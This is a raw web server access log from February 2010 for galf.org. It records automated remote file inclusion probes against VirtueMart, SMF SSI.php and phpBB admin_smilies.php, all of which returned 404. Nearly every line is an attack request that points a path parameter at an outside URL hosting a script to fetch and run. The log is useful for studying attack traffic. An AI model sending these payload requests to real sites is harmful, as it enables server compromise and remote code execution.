174.37.162.130 - - [01/Feb/2010:02:32:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:32:54 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:32:54 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:00 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:00 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:05 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:05 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:09 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:33:09 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.251.80.167 - - [01/Feb/2010:02:34:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:34:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:34:50 -0800] "GET /index0.php?show=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:34:50 -0800] "GET /logs/index0.php?show=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:34:56 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:34:57 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:00 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:00 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:06 -0800] "GET /logs//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:06 -0800] "GET /SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:06 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:15 -0800] "GET /SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:15 -0800] "GET /logs//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:15 -0800] "GET /logs/access_091102.log%20%20//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:19 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:19 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:20 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:20 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:25 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:25 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:31 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:31 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:02:35:48 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:50 -0800] "GET /logs//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:50 -0800] "GET /logs/access.log//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:35:50 -0800] "GET /SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:51 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:51 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:51 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:35:51 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:36:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:36:02 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:36:02 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:36:07 -0800] "GET /logs//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:36:07 -0800] "GET /SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:36:08 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:36:22 -0800] "GET /SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:36:23 -0800] "GET /logs/access.log//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.141.56.136 - - [01/Feb/2010:02:36:23 -0800] "GET /logs//SSI.php?sourcedir=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:36:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:36:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:28 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:29 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:29 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:33 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:33 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:37 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:37 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:37:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:02 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:02 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:12 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:12 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.251.80.167 - - [01/Feb/2010:02:38:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:38:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:36 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:36 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.251.189.204 - - [01/Feb/2010:02:38:47 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:38:47 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:38:47 -0800] "GET /logs/access_090713.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:38:50 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:38:50 -0800] "GET /logs/access_090713.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:38:50 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:38:53 -0800] "GET /logs/access_091207.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.251.189.204 - - [01/Feb/2010:02:38:53 -0800] "GET /logs/access_091207.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:56 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.37.162.130 - - [01/Feb/2010:02:38:56 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.13.69.245 - - [01/Feb/2010:02:38:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
69.13.69.245 - - [01/Feb/2010:02:38:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:39:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
203.251.80.167 - - [01/Feb/2010:02:39:50 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.distribatt.info/images/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:39:52 -0800] "GET /logs/access.log//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:39:52 -0800] "GET /admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:39:52 -0800] "GET /logs//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.80.156.113 - - [01/Feb/2010:02:40:50 -0800] "GET /logs/access.log%20%20//admin_smilies.php?phpbb_root_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:42:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:42:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [01/Feb/2010:02:42:29 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
